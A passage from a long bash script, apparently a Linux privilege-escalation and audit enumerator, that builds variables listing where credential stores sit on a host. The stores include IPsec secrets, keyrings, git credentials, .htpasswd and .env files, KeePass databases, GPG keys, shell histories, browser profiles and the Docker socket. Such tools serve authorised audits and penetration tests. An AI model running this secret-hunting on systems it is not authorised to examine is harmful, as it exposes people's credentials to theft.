"neo4j$" | sort | uniq | head -n 70) + PSTORAGE_CLOUD_INIT=$(echo -e "$FIND_HOMESEARCH\n$FIND_USR\n$FIND_MNT\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_CDROM\n$FIND_SRV\n$FIND_APPLICATIONS\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_BIN\n$FIND_RUN\n$FIND_LIB64\n$FIND_SYS\n$FIND_PRIVATE\n$FIND_CACHE\n$FIND_TMP\n$FIND_LIB\n$FIND_OPT\n$FIND_LIB32\n$FIND_SYSTEMD\n$FIND_VAR" | grep -E "^/srv|^/private|^/bin|^/applications|^/cdrom|^/tmp|^$GREPHOMESEARCH|^/sbin|^/media|^/mnt|^/snap|^/etc|^/var|^/opt|^/usr|^/.cache" | grep -E "cloud\.cfg$" | sort | uniq | head -n 70) + PSTORAGE_ERLANG=$(echo -e "$FIND_HOMESEARCH\n$FIND_USR\n$FIND_MNT\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_CDROM\n$FIND_SRV\n$FIND_APPLICATIONS\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_BIN\n$FIND_RUN\n$FIND_LIB64\n$FIND_SYS\n$FIND_PRIVATE\n$FIND_CACHE\n$FIND_TMP\n$FIND_LIB\n$FIND_OPT\n$FIND_LIB32\n$FIND_SYSTEMD\n$FIND_VAR" | grep -E "^/srv|^/private|^/bin|^/applications|^/cdrom|^/tmp|^$GREPHOMESEARCH|^/sbin|^/media|^/mnt|^/snap|^/etc|^/var|^/opt|^/usr|^/.cache" | grep -E "\.erlang\.cookie$" | sort | uniq | head -n 70) + PSTORAGE_GMV_AUTH=$(echo -e "$FIND_HOMESEARCH\n$FIND_USR\n$FIND_MNT\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_CDROM\n$FIND_SRV\n$FIND_APPLICATIONS\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_BIN\n$FIND_RUN\n$FIND_LIB64\n$FIND_SYS\n$FIND_PRIVATE\n$FIND_CACHE\n$FIND_TMP\n$FIND_LIB\n$FIND_OPT\n$FIND_LIB32\n$FIND_SYSTEMD\n$FIND_VAR" | grep -E "^/srv|^/private|^/bin|^/applications|^/cdrom|^/tmp|^$GREPHOMESEARCH|^/sbin|^/media|^/mnt|^/snap|^/etc|^/var|^/opt|^/usr|^/.cache" | grep -E "gvm-tools\.conf$" | sort | uniq | head -n 70) + PSTORAGE_IPSEC=$(echo -e "$FIND_HOMESEARCH\n$FIND_USR\n$FIND_MNT\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_CDROM\n$FIND_SRV\n$FIND_APPLICATIONS\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_BIN\n$FIND_RUN\n$FIND_LIB64\n$FIND_SYS\n$FIND_PRIVATE\n$FIND_CACHE\n$FIND_TMP\n$FIND_LIB\n$FIND_OPT\n$FIND_LIB32\n$FIND_SYSTEMD\n$FIND_VAR" | grep -E "^/srv|^/private|^/bin|^/applications|^/cdrom|^/tmp|^$GREPHOMESEARCH|^/sbin|^/media|^/mnt|^/snap|^/etc|^/var|^/opt|^/usr|^/.cache" | grep -E "ipsec\.secrets$|ipsec\.conf$" | sort | uniq | head -n 70) + PSTORAGE_IRSSI=$(echo -e "$FIND_DIR_SBIN\n$FIND_DIR_CDROM\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_USR\n$FIND_DIR_CACHE\n$FIND_DIR_ETC\n$FIND_DIR_MEDIA\n$FIND_DIR_TMP\n$FIND_DIR_SRV\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN\n$FIND_DIR_OPT\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_VAR" | grep -E "^/srv|^/private|^/bin|^/applications|^/cdrom|^/tmp|^$GREPHOMESEARCH|^/sbin|^/media|^/mnt|^/snap|^/etc|^/var|^/opt|^/usr|^/.cache" | grep -E "\.irssi$" | sort | uniq | head -n 70) + PSTORAGE_KEYRING=$(echo -e "$FIND_HOMESEARCH\n$FIND_USR\n$FIND_MNT\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_CDROM\n$FIND_SRV\n$FIND_APPLICATIONS\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_BIN\n$FIND_RUN\n$FIND_LIB64\n$FIND_SYS\n$FIND_PRIVATE\n$FIND_CACHE\n$FIND_TMP\n$FIND_LIB\n$FIND_OPT\n$FIND_LIB32\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_DIR_SBIN\n$FIND_DIR_CDROM\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_USR\n$FIND_DIR_CACHE\n$FIND_DIR_ETC\n$FIND_DIR_MEDIA\n$FIND_DIR_TMP\n$FIND_DIR_SRV\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN\n$FIND_DIR_OPT\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_VAR" | grep -E "^/srv|^/private|^/bin|^/applications|^/cdrom|^/tmp|^$GREPHOMESEARCH|^/sbin|^/media|^/mnt|^/snap|^/etc|^/var|^/opt|^/usr|^/.cache" | grep -E "keyrings$|.*\.keyring$|.*\.keystore$|.*\.jks$" | sort | uniq | head -n 70) + PSTORAGE_FILEZILLA=$(echo -e "$FIND_HOMESEARCH\n$FIND_USR\n$FIND_MNT\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_CDROM\n$FIND_SRV\n$FIND_APPLICATIONS\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_BIN\n$FIND_RUN\n$FIND_LIB64\n$FIND_SYS\n$FIND_PRIVATE\n$FIND_CACHE\n$FIND_TMP\n$FIND_LIB\n$FIND_OPT\n$FIND_LIB32\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_DIR_SBIN\n$FIND_DIR_CDROM\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_USR\n$FIND_DIR_CACHE\n$FIND_DIR_ETC\n$FIND_DIR_MEDIA\n$FIND_DIR_TMP\n$FIND_DIR_SRV\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN\n$FIND_DIR_OPT\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_VAR" | grep -E "^/srv|^/private|^/bin|^/applications|^/cdrom|^/tmp|^$GREPHOMESEARCH|^/sbin|^/media|^/mnt|^/snap|^/etc|^/var|^/opt|^/usr|^/.cache" | grep -E "filezilla$|filezilla\.xml$|recentservers\.xml$" | sort | uniq | head -n 70) + PSTORAGE_BACKUP_MANAGER=$(echo -e "$FIND_HOMESEARCH\n$FIND_USR\n$FIND_MNT\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_CDROM\n$FIND_SRV\n$FIND_APPLICATIONS\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_BIN\n$FIND_RUN\n$FIND_LIB64\n$FIND_SYS\n$FIND_PRIVATE\n$FIND_CACHE\n$FIND_TMP\n$FIND_LIB\n$FIND_OPT\n$FIND_LIB32\n$FIND_SYSTEMD\n$FIND_VAR" | grep -E "^/srv|^/private|^/bin|^/applications|^/cdrom|^/tmp|^$GREPHOMESEARCH|^/sbin|^/media|^/mnt|^/snap|^/etc|^/var|^/opt|^/usr|^/.cache" | grep -E "storage\.php$|database\.php$" | sort | uniq | head -n 70) + PSTORAGE_SPLUNK=$(echo -e "$FIND_HOMESEARCH\n$FIND_USR\n$FIND_MNT\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_CDROM\n$FIND_SRV\n$FIND_APPLICATIONS\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_BIN\n$FIND_RUN\n$FIND_LIB64\n$FIND_SYS\n$FIND_PRIVATE\n$FIND_CACHE\n$FIND_TMP\n$FIND_LIB\n$FIND_OPT\n$FIND_LIB32\n$FIND_SYSTEMD\n$FIND_VAR" | grep -E "^/srv|^/private|^/bin|^/applications|^/cdrom|^/tmp|^$GREPHOMESEARCH|^/sbin|^/media|^/mnt|^/snap|^/etc|^/var|^/opt|^/usr|^/.cache" | grep -E "passwd$" | sort | uniq | head -n 70) + PSTORAGE_GITLAB=$(echo -e "$FIND_HOMESEARCH\n$FIND_USR\n$FIND_MNT\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_CDROM\n$FIND_SRV\n$FIND_APPLICATIONS\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_BIN\n$FIND_RUN\n$FIND_LIB64\n$FIND_SYS\n$FIND_PRIVATE\n$FIND_CACHE\n$FIND_TMP\n$FIND_LIB\n$FIND_OPT\n$FIND_LIB32\n$FIND_SYSTEMD\n$FIND_VAR" | grep -v -E '/lib' | grep -E "^/srv|^/private|^/bin|^/applications|^/cdrom|^/tmp|^$GREPHOMESEARCH|^/sbin|^/media|^/mnt|^/snap|^/etc|^/var|^/opt|^/usr|^/.cache" | grep -E "secrets\.yml$|gitlab\.yml$|gitlab\.rm$" | sort | uniq | head -n 70) + PSTORAGE_PGP_GPG=$(echo -e "$FIND_HOMESEARCH\n$FIND_USR\n$FIND_MNT\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_CDROM\n$FIND_SRV\n$FIND_APPLICATIONS\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_BIN\n$FIND_RUN\n$FIND_LIB64\n$FIND_SYS\n$FIND_PRIVATE\n$FIND_CACHE\n$FIND_TMP\n$FIND_LIB\n$FIND_OPT\n$FIND_LIB32\n$FIND_SYSTEMD\n$FIND_VAR" | grep -v -E 'README.gnupg' | grep -E "^/srv|^/private|^/bin|^/applications|^/cdrom|^/tmp|^$GREPHOMESEARCH|^/sbin|^/media|^/mnt|^/snap|^/etc|^/var|^/opt|^/usr|^/.cache" | grep -E ".*\.pgp$|.*\.gpg$|.*\.gnupg$" | sort | uniq | head -n 70) + PSTORAGE_CACHE_VI=$(echo -e "$FIND_HOMESEARCH\n$FIND_USR\n$FIND_MNT\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_CDROM\n$FIND_SRV\n$FIND_APPLICATIONS\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_BIN\n$FIND_RUN\n$FIND_LIB64\n$FIND_SYS\n$FIND_PRIVATE\n$FIND_CACHE\n$FIND_TMP\n$FIND_LIB\n$FIND_OPT\n$FIND_LIB32\n$FIND_SYSTEMD\n$FIND_VAR" | grep -E "^/srv|^/private|^/bin|^/applications|^/cdrom|^/tmp|^$GREPHOMESEARCH|^/sbin|^/media|^/mnt|^/snap|^/etc|^/var|^/opt|^/usr|^/.cache" | grep -E ".*\.swp$|.*\.viminfo$" | sort | uniq | head -n 70) + PSTORAGE_DOCKER=$(echo -e "$FIND_HOMESEARCH\n$FIND_USR\n$FIND_MNT\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_CDROM\n$FIND_SRV\n$FIND_APPLICATIONS\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_BIN\n$FIND_RUN\n$FIND_LIB64\n$FIND_SYS\n$FIND_PRIVATE\n$FIND_CACHE\n$FIND_TMP\n$FIND_LIB\n$FIND_OPT\n$FIND_LIB32\n$FIND_SYSTEMD\n$FIND_VAR" | grep -E "^/srv|^/private|^/bin|^/applications|^/cdrom|^/tmp|^$GREPHOMESEARCH|^/sbin|^/media|^/mnt|^/snap|^/etc|^/var|^/opt|^/usr|^/.cache" | grep -E "docker\.socket$|docker\.sock$|Dockerfile$|docker-compose\.yml$" | sort | uniq | head -n 70) + PSTORAGE_FIREFOX=$(echo -e "$FIND_HOMESEARCH\n$FIND_USR\n$FIND_MNT\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_CDROM\n$FIND_SRV\n$FIND_APPLICATIONS\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_BIN\n$FIND_RUN\n$FIND_LIB64\n$FIND_SYS\n$FIND_PRIVATE\n$FIND_CACHE\n$FIND_TMP\n$FIND_LIB\n$FIND_OPT\n$FIND_LIB32\n$FIND_SYSTEMD\n$FIND_VAR" | grep -E "^" | grep -E "\.mozilla$|Firefox$" | sort | uniq | head -n 70) + PSTORAGE_CHROME=$(echo -e "$FIND_HOMESEARCH\n$FIND_USR\n$FIND_MNT\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_CDROM\n$FIND_SRV\n$FIND_APPLICATIONS\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_BIN\n$FIND_RUN\n$FIND_LIB64\n$FIND_SYS\n$FIND_PRIVATE\n$FIND_CACHE\n$FIND_TMP\n$FIND_LIB\n$FIND_OPT\n$FIND_LIB32\n$FIND_SYSTEMD\n$FIND_VAR" | grep -E "^" | grep -E "google-chrome$|Chrome$" | sort | uniq | head -n 70) + PSTORAGE_OPERA=$(echo -e "$FIND_HOMESEARCH\n$FIND_USR\n$FIND_MNT\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_CDROM\n$FIND_SRV\n$FIND_APPLICATIONS\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_BIN\n$FIND_RUN\n$FIND_LIB64\n$FIND_SYS\n$FIND_PRIVATE\n$FIND_CACHE\n$FIND_TMP\n$FIND_LIB\n$FIND_OPT\n$FIND_LIB32\n$FIND_SYSTEMD\n$FIND_VAR" | grep -E "^" | grep -E "com\.operasoftware\.Opera$" | sort | uniq | head -n 70) + PSTORAGE_SAFARI=$(echo -e "$FIND_HOMESEARCH\n$FIND_USR\n$FIND_MNT\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_CDROM\n$FIND_SRV\n$FIND_APPLICATIONS\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_BIN\n$FIND_RUN\n$FIND_LIB64\n$FIND_SYS\n$FIND_PRIVATE\n$FIND_CACHE\n$FIND_TMP\n$FIND_LIB\n$FIND_OPT\n$FIND_LIB32\n$FIND_SYSTEMD\n$FIND_VAR" | grep -E "^" | grep -E "Safari$" | sort | uniq | head -n 70) + PSTORAGE_AUTOLOGIN=$(echo -e "$FIND_HOMESEARCH\n$FIND_USR\n$FIND_MNT\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_CDROM\n$FIND_SRV\n$FIND_APPLICATIONS\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_BIN\n$FIND_RUN\n$FIND_LIB64\n$FIND_SYS\n$FIND_PRIVATE\n$FIND_CACHE\n$FIND_TMP\n$FIND_LIB\n$FIND_OPT\n$FIND_LIB32\n$FIND_SYSTEMD\n$FIND_VAR" | grep -E "^/srv|^/private|^/bin|^/applications|^/cdrom|^/tmp|^$GREPHOMESEARCH|^/sbin|^/media|^/mnt|^/snap|^/etc|^/var|^/opt|^/usr|^/.cache" | grep -E "autologin$|autologin\.conf$" | sort | uniq | head -n 70) + PSTORAGE_FASTCGI=$(echo -e "$FIND_HOMESEARCH\n$FIND_USR\n$FIND_MNT\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_CDROM\n$FIND_SRV\n$FIND_APPLICATIONS\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_BIN\n$FIND_RUN\n$FIND_LIB64\n$FIND_SYS\n$FIND_PRIVATE\n$FIND_CACHE\n$FIND_TMP\n$FIND_LIB\n$FIND_OPT\n$FIND_LIB32\n$FIND_SYSTEMD\n$FIND_VAR" | grep -E "^/srv|^/private|^/bin|^/applications|^/cdrom|^/tmp|^$GREPHOMESEARCH|^/sbin|^/media|^/mnt|^/snap|^/etc|^/var|^/opt|^/usr|^/.cache" | grep -E "fastcgi_params$" | sort | uniq | head -n 70) + PSTORAGE_SNMP=$(echo -e "$FIND_HOMESEARCH\n$FIND_USR\n$FIND_MNT\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_CDROM\n$FIND_SRV\n$FIND_APPLICATIONS\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_BIN\n$FIND_RUN\n$FIND_LIB64\n$FIND_SYS\n$FIND_PRIVATE\n$FIND_CACHE\n$FIND_TMP\n$FIND_LIB\n$FIND_OPT\n$FIND_LIB32\n$FIND_SYSTEMD\n$FIND_VAR" | grep -E "^/srv|^/private|^/bin|^/applications|^/cdrom|^/tmp|^$GREPHOMESEARCH|^/sbin|^/media|^/mnt|^/snap|^/etc|^/var|^/opt|^/usr|^/.cache" | grep -E "snmpd\.conf$" | sort | uniq | head -n 70) + PSTORAGE_PYPIRC=$(echo -e "$FIND_HOMESEARCH\n$FIND_USR\n$FIND_MNT\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_CDROM\n$FIND_SRV\n$FIND_APPLICATIONS\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_BIN\n$FIND_RUN\n$FIND_LIB64\n$FIND_SYS\n$FIND_PRIVATE\n$FIND_CACHE\n$FIND_TMP\n$FIND_LIB\n$FIND_OPT\n$FIND_LIB32\n$FIND_SYSTEMD\n$FIND_VAR" | grep -E "^/srv|^/private|^/bin|^/applications|^/cdrom|^/tmp|^$GREPHOMESEARCH|^/sbin|^/media|^/mnt|^/snap|^/etc|^/var|^/opt|^/usr|^/.cache" | grep -E "\.pypirc$" | sort | uniq | head -n 70) + PSTORAGE_POSTFIX=$(echo -e "$FIND_DIR_SBIN\n$FIND_DIR_CDROM\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_USR\n$FIND_DIR_CACHE\n$FIND_DIR_ETC\n$FIND_DIR_MEDIA\n$FIND_DIR_TMP\n$FIND_DIR_SRV\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN\n$FIND_DIR_OPT\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_VAR" | grep -E "^/srv|^/private|^/bin|^/applications|^/cdrom|^/tmp|^$GREPHOMESEARCH|^/sbin|^/media|^/mnt|^/snap|^/etc|^/var|^/opt|^/usr|^/.cache" | grep -E "postfix$" | sort | uniq | head -n 70) + PSTORAGE_CLOUDFLARE=$(echo -e "$FIND_DIR_SBIN\n$FIND_DIR_CDROM\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_USR\n$FIND_DIR_CACHE\n$FIND_DIR_ETC\n$FIND_DIR_MEDIA\n$FIND_DIR_TMP\n$FIND_DIR_SRV\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN\n$FIND_DIR_OPT\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_VAR" | grep -E "^/srv|^/private|^/bin|^/applications|^/cdrom|^/tmp|^$GREPHOMESEARCH|^/sbin|^/media|^/mnt|^/snap|^/etc|^/var|^/opt|^/usr|^/.cache" | grep -E "\.cloudflared$" | sort | uniq | head -n 70) + PSTORAGE_HISTORY=$(echo -e "$FIND_HOMESEARCH\n$FIND_USR\n$FIND_MNT\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_CDROM\n$FIND_SRV\n$FIND_APPLICATIONS\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_BIN\n$FIND_RUN\n$FIND_LIB64\n$FIND_SYS\n$FIND_PRIVATE\n$FIND_CACHE\n$FIND_TMP\n$FIND_LIB\n$FIND_OPT\n$FIND_LIB32\n$FIND_SYSTEMD\n$FIND_VAR" | grep -E "^/srv|^/private|^/bin|^/applications|^/cdrom|^/tmp|^$GREPHOMESEARCH|^/sbin|^/media|^/mnt|^/snap|^/etc|^/var|^/opt|^/usr|^/.cache" | grep -E ".*_history.*$" | sort | uniq | head -n 70) + PSTORAGE_HTTP_CONF=$(echo -e "$FIND_HOMESEARCH\n$FIND_USR\n$FIND_MNT\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_CDROM\n$FIND_SRV\n$FIND_APPLICATIONS\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_BIN\n$FIND_RUN\n$FIND_LIB64\n$FIND_SYS\n$FIND_PRIVATE\n$FIND_CACHE\n$FIND_TMP\n$FIND_LIB\n$FIND_OPT\n$FIND_LIB32\n$FIND_SYSTEMD\n$FIND_VAR" | grep -E "^/srv|^/private|^/bin|^/applications|^/cdrom|^/tmp|^$GREPHOMESEARCH|^/sbin|^/media|^/mnt|^/snap|^/etc|^/var|^/opt|^/usr|^/.cache" | grep -E "httpd\.conf$" | sort | uniq | head -n 70) + PSTORAGE_HTPASSWD=$(echo -e "$FIND_HOMESEARCH\n$FIND_USR\n$FIND_MNT\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_CDROM\n$FIND_SRV\n$FIND_APPLICATIONS\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_BIN\n$FIND_RUN\n$FIND_LIB64\n$FIND_SYS\n$FIND_PRIVATE\n$FIND_CACHE\n$FIND_TMP\n$FIND_LIB\n$FIND_OPT\n$FIND_LIB32\n$FIND_SYSTEMD\n$FIND_VAR" | grep -E "^/srv|^/private|^/bin|^/applications|^/cdrom|^/tmp|^$GREPHOMESEARCH|^/sbin|^/media|^/mnt|^/snap|^/etc|^/var|^/opt|^/usr|^/.cache" | grep -E "\.htpasswd$" | sort | uniq | head -n 70) + PSTORAGE_LDAPRC=$(echo -e "$FIND_HOMESEARCH\n$FIND_USR\n$FIND_MNT\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_CDROM\n$FIND_SRV\n$FIND_APPLICATIONS\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_BIN\n$FIND_RUN\n$FIND_LIB64\n$FIND_SYS\n$FIND_PRIVATE\n$FIND_CACHE\n$FIND_TMP\n$FIND_LIB\n$FIND_OPT\n$FIND_LIB32\n$FIND_SYSTEMD\n$FIND_VAR" | grep -E "^/srv|^/private|^/bin|^/applications|^/cdrom|^/tmp|^$GREPHOMESEARCH|^/sbin|^/media|^/mnt|^/snap|^/etc|^/var|^/opt|^/usr|^/.cache" | grep -E "\.ldaprc$" | sort | uniq | head -n 70) + PSTORAGE_ENV=$(echo -e "$FIND_HOMESEARCH\n$FIND_USR\n$FIND_MNT\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_CDROM\n$FIND_SRV\n$FIND_APPLICATIONS\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_BIN\n$FIND_RUN\n$FIND_LIB64\n$FIND_SYS\n$FIND_PRIVATE\n$FIND_CACHE\n$FIND_TMP\n$FIND_LIB\n$FIND_OPT\n$FIND_LIB32\n$FIND_SYSTEMD\n$FIND_VAR" | grep -E "^/srv|^/private|^/bin|^/applications|^/cdrom|^/tmp|^$GREPHOMESEARCH|^/sbin|^/media|^/mnt|^/snap|^/etc|^/var|^/opt|^/usr|^/.cache" | grep -E "\.env$" | sort | uniq | head -n 70) + PSTORAGE_MSMTPRC=$(echo -e "$FIND_HOMESEARCH\n$FIND_USR\n$FIND_MNT\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_CDROM\n$FIND_SRV\n$FIND_APPLICATIONS\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_BIN\n$FIND_RUN\n$FIND_LIB64\n$FIND_SYS\n$FIND_PRIVATE\n$FIND_CACHE\n$FIND_TMP\n$FIND_LIB\n$FIND_OPT\n$FIND_LIB32\n$FIND_SYSTEMD\n$FIND_VAR" | grep -E "^/srv|^/private|^/bin|^/applications|^/cdrom|^/tmp|^$GREPHOMESEARCH|^/sbin|^/media|^/mnt|^/snap|^/etc|^/var|^/opt|^/usr|^/.cache" | grep -E "\.msmtprc$" | sort | uniq | head -n 70) + PSTORAGE_INFLUXDB=$(echo -e "$FIND_HOMESEARCH\n$FIND_USR\n$FIND_MNT\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_CDROM\n$FIND_SRV\n$FIND_APPLICATIONS\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_BIN\n$FIND_RUN\n$FIND_LIB64\n$FIND_SYS\n$FIND_PRIVATE\n$FIND_CACHE\n$FIND_TMP\n$FIND_LIB\n$FIND_OPT\n$FIND_LIB32\n$FIND_SYSTEMD\n$FIND_VAR" | grep -E "^/srv|^/private|^/bin|^/applications|^/cdrom|^/tmp|^$GREPHOMESEARCH|^/sbin|^/media|^/mnt|^/snap|^/etc|^/var|^/opt|^/usr|^/.cache" | grep -E "influxdb\.conf$" | sort | uniq | head -n 70) + PSTORAGE_ZABBIX=$(echo -e "$FIND_HOMESEARCH\n$FIND_USR\n$FIND_MNT\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_CDROM\n$FIND_SRV\n$FIND_APPLICATIONS\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_BIN\n$FIND_RUN\n$FIND_LIB64\n$FIND_SYS\n$FIND_PRIVATE\n$FIND_CACHE\n$FIND_TMP\n$FIND_LIB\n$FIND_OPT\n$FIND_LIB32\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_DIR_SBIN\n$FIND_DIR_CDROM\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_USR\n$FIND_DIR_CACHE\n$FIND_DIR_ETC\n$FIND_DIR_MEDIA\n$FIND_DIR_TMP\n$FIND_DIR_SRV\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN\n$FIND_DIR_OPT\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_VAR" | grep -E "^/srv|^/private|^/bin|^/applications|^/cdrom|^/tmp|^$GREPHOMESEARCH|^/sbin|^/media|^/mnt|^/snap|^/etc|^/var|^/opt|^/usr|^/.cache" | grep -E "zabbix_server\.conf$|zabbix_agentd\.conf$|zabbix$" | sort | uniq | head -n 70) + PSTORAGE_GITHUB=$(echo -e "$FIND_HOMESEARCH\n$FIND_USR\n$FIND_MNT\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_CDROM\n$FIND_SRV\n$FIND_APPLICATIONS\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_BIN\n$FIND_RUN\n$FIND_LIB64\n$FIND_SYS\n$FIND_PRIVATE\n$FIND_CACHE\n$FIND_TMP\n$FIND_LIB\n$FIND_OPT\n$FIND_LIB32\n$FIND_SYSTEMD\n$FIND_VAR" | grep -E "^/srv|^/private|^/bin|^/applications|^/cdrom|^/tmp|^$GREPHOMESEARCH|^/sbin|^/media|^/mnt|^/snap|^/etc|^/var|^/opt|^/usr|^/.cache" | grep -E "\.github$|\.gitconfig$|\.git-credentials$|\.git$" | sort | uniq | head -n 70) + PSTORAGE_SVN=$(echo -e "$FIND_DIR_SBIN\n$FIND_DIR_CDROM\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_USR\n$FIND_DIR_CACHE\n$FIND_DIR_ETC\n$FIND_DIR_MEDIA\n$FIND_DIR_TMP\n$FIND_DIR_SRV\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN\n$FIND_DIR_OPT\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_VAR" | grep -E "^/srv|^/private|^/bin|^/applications|^/cdrom|^/tmp|^$GREPHOMESEARCH|^/sbin|^/media|^/mnt|^/snap|^/etc|^/var|^/opt|^/usr|^/.cache" | grep -E "\.svn$" | sort | uniq | head -n 70) + PSTORAGE_KEEPASS=$(echo -e "$FIND_HOMESEARCH\n$FIND_USR\n$FIND_MNT\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_CDROM\n$FIND_SRV\n$FIND_APPLICATIONS\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_BIN\n$FIND_RUN\n$FIND_LIB64\n$FIND_SYS\n$FIND_PRIVATE\n$FIND_CACHE\n$FIND_TMP\n$FIND_LIB\n$FIND_OPT\n$FIND_LIB32\n$FIND_SYSTEMD\n$FIND_VAR" | grep -E "^/srv|^/private|^/bin|^/applications|^/cdrom|^/tmp|^$GREPHOMESEARCH|^/sbin|^/media|^/mnt|^/snap|^/etc|^/var|^/opt|^/usr|^/.cache" | grep -E ".*\.kdbx$|KeePass\.config.*$|KeePass\.ini$|KeePass\.enforced.*$" | sort | uniq | head -n 70) + PSTORAGE_PRE_SHARED_KEYS=$(echo -e "$FIND_HOMESEARCH\n$FIND_USR\n$FIND_MNT\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_CDROM\n$FIND_SRV\n$FIND_APPLICATIONS\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_BIN\n$FIND_RUN\n$FIND_LIB64\n$FIND_SYS\n$FIND_PRIVATE\n$FIND_CACHE\n$FIND_TMP\n$FIND_LIB\n$FIND_OPT\n$FIND_LIB32\n$FIND_SYSTEMD\n$FIND_VAR" | grep -E "^/srv|^/private|^/bin|^/applications|^/cdrom|^/tmp|^$GREPHOMESEARCH|^/sbin|^/media|^/mnt|^/snap|^/etc|^/var|^/opt|^/usr|^/.cache" | grep -E ".*\.psk$" | sort | uniq | head -n 70) + PSTORAGE_PASS_STORE_DIRECTORIES=$(echo -e 